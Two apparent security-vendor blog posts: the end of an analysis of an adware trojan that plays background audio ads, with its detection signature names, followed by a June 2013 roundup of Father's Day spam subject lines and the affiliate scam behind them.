referers.txt contains the following data:

      twitter|http://t.co/
      pinterest|http://pinterest.com/pin/
      facebook|http://www.facebook.com/l.php?u=%s&h=%s&s=1

The Trojan requests a list of modules to download from a remote web server and proceeds to download them. The modules are required for audio playback and for downloading ads from sites:

The Trojan spawns multiple copies of silentium.exe and awesomium_process.exe:

An instance of silentium.exe was observed being spawned with the following command line, which shows the source of one of the ads on youtube.com:

After a short period of time the victim is bombarded with various audio ads that play continuously in the background. Because a number of instances of silentium.exe are running, multiple ads play over each other. The above command line resulted in audio advertisements from a dating site being played in the background.

SonicWALL Gateway AntiVirus provides protection against this threat via the following signatures:

  • GAV: Clicker.BDIK (Adware)
  • GAV: Clicker.BDHP (Adware)
  • GAV: Clicker.BBII (Adware)
  • GAV: Clicker.BDHP_2 (Adware)
  • GAV: MalAgent.G_2412 (Trojan)

Spam campaign roundup: The Fathers Day Edition (June 14, 2013)

Father’s Day is coming up this weekend. It is a day of honoring fathers and in many countries it is celebrated on the third Sunday of June. Many will buy gifts and struggle for last minute ideas. Because shoppers are expected to spend, cyber criminals will use this opportunity to profit through spam campaigns.

Over the last week, the Dell SonicWALL threats research team has been tracking all Father’s Day related spam emails.


As the Father’s Day weekend approaches, we are receiving an increasing amount of holiday-related spam. These emails share a common theme: luring consumers into clicking links and providing their personal information in exchange for access to special offers. The following are some of the most common email subjects:

  • 31 Hours Left On All Father’s Day Deals
  • Please activate your 2,300 dollars by Fathers Day
  • Nobody will believe you paid 50% less on your car at this Fathers day Event
  • Father Day – Get 15 Premium Cigars + Bonus Humidor + Free Shipping!
  • Instant Price Markdowns if you are a father on Fathers Day (must see this)(50% off) Fathers Day Mark


The links in the emails take users to a spam site that is part of the same affiliate marketing scheme we have seen in the past. It tries to convince users to sign up for different offers, and the scammers earn a commission for each successful subscription.

We urge our users to always be vigilant and cautious with any unsolicited email and to avoid providing any personal information, particularly if you are not certain of the source.

Dell SonicWALL Gateway Antivirus monitors and provides constant protection against such malicious threats.